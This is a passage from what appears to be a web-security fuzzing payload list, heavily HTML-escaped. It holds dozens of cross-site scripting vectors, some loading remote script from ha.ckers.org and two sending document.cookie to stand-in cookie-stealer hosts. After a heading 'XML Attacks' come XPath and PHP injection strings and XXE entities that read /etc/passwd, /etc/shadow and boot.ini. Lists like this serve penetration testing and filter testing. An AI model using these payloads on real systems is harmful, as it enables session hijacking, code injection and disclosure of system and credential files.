&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
